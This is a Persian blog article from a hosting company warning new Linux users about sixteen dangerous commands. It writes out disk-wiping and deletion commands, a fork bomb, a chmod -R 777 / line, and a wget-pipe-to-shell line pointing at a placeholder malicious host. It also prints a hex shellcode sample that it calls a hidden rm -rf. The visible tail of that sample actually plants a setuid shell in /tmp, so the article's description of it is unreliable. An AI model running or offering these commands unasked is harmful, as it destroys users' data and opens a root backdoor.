اشنایی با کامند های خطرناک لینوکس که نباید اجرا کنید!

لینوکس

فردی که به تازگی وارد دنیای لینوکس شده است، آشنایی کاملی با کامندها ندارد و می تواند با یک کامند اشتباه، تمامی رشته های خود را پنبه کند و سیستم عامل خودش را در معرض خطر قرار دهد. اما اگر با دستوراتی که خطرناک هستند آشنا باشد، در این صورت می تواند با خیال راحت کار کند و از مزیت ها و ویژگی های لینوکس بهره ببرد و به همین دلیل است که ما می گوییم لینوکس یک شمشیر دو لبه است.

ما تصمیم گرفتیم که تعدادی از کدهایی که می تواند برایتان خطر آفرین باشد را در این مقاله برایتان بیاوریم. دانستن کدهایی که شما را به دردسر می اندازد، یک روش پیشگیری بسیار موثر است. پس اگر شما هم از کاربران مبتدی هستید، این مقاله را از دست ندهید.

در صورتی که دوست دارید با لینوکس کار کنید، توصیه می کنیم این کار را با کمک سرور مجازی لینوکس شروع کنید. چرا که تیم پشتیبانی ما به صورت ۲۴ ساعته در تمام روزهای هفته در کنار شما هستید تا در صورت بروز مشکل، آن را حل کنند و به همین دلیل شما خیالتان از بابت امنیت راحت خواهد بود. برای این کار می توانید به صفحه خرید سرور مجازی لینوکس در سایت ما سر بزنید.

rm -rf / .1

دستور rm یک دستور لینوکس است که برای حذف فایل‌ها و پوشه‌ها با توجه به آرگومان‌های استفاده شده استفاده می‌شود. با این حال، باید با احتیاط شدید از دستور rm استفاده کرد، زیرا یک اشتباه کوچک می‌تواند به خرابی ناقابل بازیابی سیستم منجر شود.

هنگامی که دستور به عنوان روت با آرگومان / rf- اجرا شود، به صورت بازگشتی همه فایل‌ها و پوشه‌ها را در سیستم شما از روت (/) که بالاترین ساختار سلسله‌مراتبی پوشه‌ها در لینوکس است، حذف می‌کند. به طور خلاصه، دستور / rm -rf کاملاً سیستم شما را پاک کرده و باعث خرابی و بازیابی‌ناپذیر شدن سیستم می‌شود.

بعضی از گزینه‌های استفاده شده با دستور rm عبارتند از:

دستور rm در لینوکس برای حذف فایل‌ها استفاده می‌شود.

دستور rm -r پوشه را به صورت بازگشتی حذف می‌کند، حتی اگر پوشه خالی باشد.

دستور rm -f فایل “Read only File” را بدون پرسیدن حذف می‌کند.

دستور / rm -rf: تمامی چیزها در پوشه ریشه (root) را به صورت اجباری حذف می‌کند

دستور * rm -rf: تمامی چیزها در پوشه فعلی/پوشه کاری (working directory) را به صورت اجباری حذف می‌کند.

دستور . rm -rf: پوشه فعلی و زیرپوشه‌های آن را به صورت اجباری حذف می‌کند.

در واقع زمانی که فرمان را به عنوان یک کاربر معمولی اجرا می کنید، دو اخطار در ترمینال دریافت خواهید کرد.

برای جلوگیری از حذف تصادفی فایل‌ها توسط دستور “rm”، می‌توانید یک اختصار برای این دستور با نام “rm -i” در فایل “bashrc.” ایجاد کنید. این اختصار باعث می‌شود قبل از هر حذف، از شما تاییدی دریافت کند.

:(){:|:&};: .۲

در واقع، گزینه‌ی فوق یک نوع ویروس است که با نام “fork bomb” شناخته می‌شود. این ویروس با ایجاد یک تابع به نام “:” عمل می‌کند که خود را دو بار، یک بار در پیش زمینه و یک بار در پس زمینه فراخوانی می‌کند. این تابع به صورت تکراری اجرا می‌شود و به این ترتیب، تمام منابع سیستم را به خود اختصاص می‌دهد و باعث برخورد سیستم می‌شود.

در واقع، این دستور یک نوع حمله‌ی انکار سرویس (DoS) است و به عنوان ویروس Wabbit یا Rabbit نیز شناخته می‌شود. بدترین بخش این است که برای اجرای این حمله، نیازی به داشتن دسترسی روت (root) نیست.

خوشبختانه، شما می‌توانید از این حمله خود را محافظت کنید با محدود کردن تعداد فرآیندهایی که توسط کاربران محلی اجرا می‌شوند به حدود ۴۰۰۰.

شما می‌توانید این کار را با اجرای دستور زیر انجام دهید:

$ ulimit -S -u 4000

بعداً می توانید با استفاده از دستور زیر را تأیید کنید:

$ ulimit -u

> /dev/sda .3

اجرای یک دستور به همراه >/dev/sda باعث پاک شدن بلاک /dev/sda در هارد دیسک شما می‌شود. این بلاک حاوی اطلاعات فایل سیستم است و وقتی پاک شود، باعث تلف شدن سیستم می‌شود که قابل بازیابی نیست.

۴٫ mv folder /dev/null

یک عملیات مضر دیگر که نباید امتحان کنید، جابجایی یک پوشه یا فایل به /dev/null است. فایل /dev/null یک نوع ویژه از فایل است که به عنوان دستگاه تهی یا “چاله سیاه” شناخته می‌شود. هر چیزی که به /dev/null منتقل شود، از بین می‌رود.

دستور زیر تمام محتویات پوشه خانه کاربر را به /dev/null منتقل می‌کند و در نتیجه تمام داده‌های موجود در پوشه کاربر را دور می‌اندازد.

# mv /home/user/* /dev/null

۵٫ wget http://malicious_source -O- | sh

دستور wget دستوری است که فایل ها را از وب یا سرور فایل دانلود می کند. دستور بالا یک اسکریپت را از یک منبع مخرب دانلود می کند و سپس آن را اجرا می کند.

۶٫ mkfs.ext3 /dev/sda

دستور mkfs برای ایجاد یک فایل سیستم جدید (مانند ext2، ext3، ext4 و غیره) روی یک دستگاه ذخیره‌سازی فرمت‌بندی‌شده، در اکثر موارد یک پارتیشن از یک هارد دیسک استفاده می‌شود. اجرای دستور mkfs بر روی یک پارتیشن، تمامی داده‌های ذخیره شده در آن را پاک می‌کند.

اگرچه در فرمت‌بندی پارتیشن‌های دیسک مفید است، اما فرمت‌بندی کردن یک درایو کامل (مانند mkfs.ext3 /dev/sda) سیستم را کرش می‌کند و آن را در وضعیتی غیرقابل بازیابی به خواب می‌برد. این اتفاق به این دلیل رخ می‌دهد که تمامی فایل‌های سیستمی را به همراه داده‌های شخصی شما نابود می‌کند.

# mkfs.ext4 /dev/sda# mkfs.xfs /dev/sda# mkfs.btrfs /dev/sda

 > file .7

علامت “>” در لینوکس محتوای یک فایل را پاک می‌کند و آن را خالی می‌گذارد. این عمل مشابه دستور “cat /dev/null > file” است. به همین دلیل باید احتیاط کرد وقتی از اپراتورهای تغییر مسیر در سیستم لینوکس استفاده می‌کنید.

در زیر یک نمونه از چگونگی عملکرد این دستور در برابر یک فایل متنی آورده شده است. می‌توانید تصور کنید که چه بلاهایی این دستور می‌تواند در صورت استفاده اشتباه از آن برای یک فایل پیکربندی به وقوع بیافتد.

^foo^bar .8

دستور ” foo^bar^” بسته به نحوه اجرای آن می تواند خطرناک یا مفید باشد. این دستور به شما اجازه میدهد که دستوراتی که قبلا اجرا شده اند را ویرایش کنید و دوباره اجرا کنید، اما اگه به تغییراتی که در آن دستورات انجام میشود دقت نکنید، احتمالا با وضعیت ناگواری مواجه شوید.

۹٫ dd if=/dev/random of=/dev/sda

این دستور باعث پاک شدن بلاک /dev/sda و نوشتن داده‌های بی‌اهمیت و تصادفی به این بلاک می‌شود. به این ترتیب سیستم شما به یک وضعیت نامتناسب و غیرقابل بازیابی خواهد رسید.

۱۰٫ / Chmod -R 777

اگرچه این دستور ممکن است سیستم لینوکس شما را به طور فوری کرش ندهد، اما دستور chmod -R 777 / به صورت بازگشتی به همه‌ی فایل‌های سیستم لینوکس شما (شامل تمام فایل‌ها و پوشه‌ها) دسترسی کامل (خواندن، نوشتن و اجرا) را اختصاص می‌دهد.

به این ترتیب، تمامی فایل‌های پیکربندی مهم و سایر فایل‌ها برای همه کاربران قابل دسترس می‌شوند و این یک ریسک امنیتی بسیار بزرگ برای سیستم شما ایجاد می‌کند. هر کسی با قصد نامناسب می‌تواند با فایل‌های حساس بازی کرده و به راحتی سیستم شما را خراب کند.

۱۱٫ The Hidden Command

این دستور که در زیر آمده است، در واقع همان دستور قبلی است (rm -rf). در اینجا کدها به صورت هگز (Hex) پنهان شده‌اند تا کاربر ناآگاهی را فریب دهد. اجرای این دستور در ترمینال شما باعث پاک شدن کامل پارتیشن ریشه (Root) شما می‌شود.

این دستور نشان می‌دهد که تهدید ممکن است پنهان و به طور معمول قابل تشخیص نباشد. شما باید از آنچه که انجام می‌دهید و نتیجه آن چه خواهد بود، آگاه باشید. کدها را از منابع ناشناخته کامپایل/اجرا نکنید.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

۱۲٫ command > config_filename

این دستور برای پیکربندی فایل های مهم استفاده می شود. این کار دستوری به تنهایی نیست، بلکه بیشتر یک اقدام احتیاطی است.

همانطور که در بالا ذکر شد، عملگر “>” برای نوشتن در یک فایل استفاده می‌شود. این فقط هر چیزی را که قبلاً در فایل وجود داشته باشد دور می‌اندازد و اطلاعات جدید را در فایل جایگزین می‌کند.

command > config_filename

اگر از یک فایل پیکربندی مهم به عنوان مکانی برای نوشتن اطلاعات استفاده کنید، این عمل ممکن است محتوای فایل را جایگزین کند و سیستم را خراب کند.

۱۳٫ crontab -r

دستور crontab -r به شما کمک می‌کند تا وظایف روزمره را به صورت خودکار انجام دهید. با این حال، همه دستورات و راه‌های دستورات در یک فایل crontab واحد نگهداری می‌شوند و با استفاده از r- این فایل حذف می‌شود. این ممکن است به اشتباه اتفاق بیفتد وقتی که شما قصد استفاده از e- را داشته باشید و به اشتباه r- را وارد کنید. احتیاط کنید زیرا قبل از حذف فایل، هیچ سوالی برای تأیید یا عدم تأیید وجود ندارد.

حتماً پشتیبان‌گیری از فایل crontab خود را انجام دهید؛ زیرا هنگامی که این فایل حذف شود، گزینه‌های بازیابی کمی وجود دارد.

۱۴٫ gunzip untrusted.gz

باز کردن یک بایگانی نامعتبر ممکن است تبدیل به یک zip bomb شود که به عنوان decompression bomb نیز شناخته می شود. zip bomb یک فایل مخرب است که به سیستم حمله می کند تا آن را بخواند. هنگام از حالت فشرده خارج کردن فایل، فضای دیسک زیادی را اشغال می کند که می تواند برای بسیاری از سرویس های سیستم کشنده باشد.

بنابراین، بهتر است هنگام مدیریت بایگانی‌ها از منابع نامعتبر مراقب باشید، زیرا zip bomb یکی از قدیمی‌ترین فایل‌های مخرب در اینترنت است.

۱۵٫ Remove Python

قبل از اینکه به حذف نسخه‌های قدیمی‌تر پایتون از سیستم لینوکس خود فکر کنید، بدانید که سیستم برای عملکرد صحیح نیاز به یک نصب‌شده‌ی پایتون ۲ کارآمد دارد. حذف نسخه پیش‌فرض پایتون در اوبونتو باعث می‌شود که مدیر نمایش گرافیکی که برای ورود به سیستم استفاده می‌شود، از کار بیفتد و شما به سیستم خود دسترسی نخواهید داشت.

با این حال، اگر می دانید چه کاری انجام می دهید، می توانید Python2.x.x و تمام وابستگی های آن را با اجرای زیر حذف نصب کنید:

sudo apt purge python2.x-minimal

۱۶٫ Overwrite Hard Drive

اصطلاح “Overwrite Hard Drive” به معنای نوشتن مجدد بر روی هارد دیسک است، به طور تصادفی فرمت دادن هارد دیسک بد بوده است، اما امکان بازنویسی هارد دیسک با استفاده از داده های خام وجود دارد. حداقل فرمت دادن یک روش واقعی با کاربردهای عملی است، اما نوشتن مجدد هارد دیسک به صورت مستقیم کار خوبی نیست.

<em><span class="hljs-built_in">command</span></em> > /dev/hda

این دستور می‌تواند جایگزین هر دستور Bash دیگری شود. عملگر “>” خروجی دستور سمت چپ را به فایل سمت راست هدایت می‌کند. در این حالت، مهم نیست خروجی دقیق دستور سمت چپ چیست، زیرا داده‌های خام به کار گرفته شده و برای نوشتن مجدد هارد دیسک سیستم استفاده می‌شوند.

همانطور که می‌توانید تصور کنید، این باعث بی‌استفاده شدن هارد دیسک می‌شود.

سخن آخر

در این مقاله فهرستی از دستورات را که ممکن است شما را به دردسر بیندازند، ارائه کرده‌ایم. توجه داشته باشید که نباید از ترس اشتباه کردن، از کار با لینوکس هراس داشته باشید. تا زمانی که ریسک نکنید و اشتباه نکنید، نمی‌توانید به خوبی به لینوکس تسلط پیدا کنید. علاوه بر این، آشنایی با دستورات خطرناک می‌تواند مفید باشد و همچنین آشنایی با پرکاربردترین دستورات لینوکس برای مبتدیان نیز بسیار مفید است. بنابراین حتماً این مقاله را در سایت ما مطالعه کنید.

توصیه دیگری که داریم این است که از دستورات منابع نامشخص و غیرمطمئن استفاده نکنید و همیشه به امنیت لینوکس توجه داشته باشید.

اگر این مقاله برای شما مفید بود، آن را با دوستانتان به اشتراک بگذارید و اگر سوالی در این زمینه دارید، در قسمت نظرات با ما مطرح کنید تا در سریع‌ترین زمان پاسخ دهیم.

آخرین نوشته ها

تماس با ما

 کرج، شاهین ویلا، بلوار امام خمینی ، خیابان نهم شرقی ، برج شاهین ،طبقه اول واحد2

 91014618

  info@shopingserver.net

با تلفن ثابت بدون پیش شماره قابل شماره گیری هست و در صورتی که با تلفن همراه قصد تماس گرفتن دارید از پیش شماره استان خود را اول شماره وارد نمایید.

سبحان لطیف کار

سبحان لطیف کار

مطالب مرتبط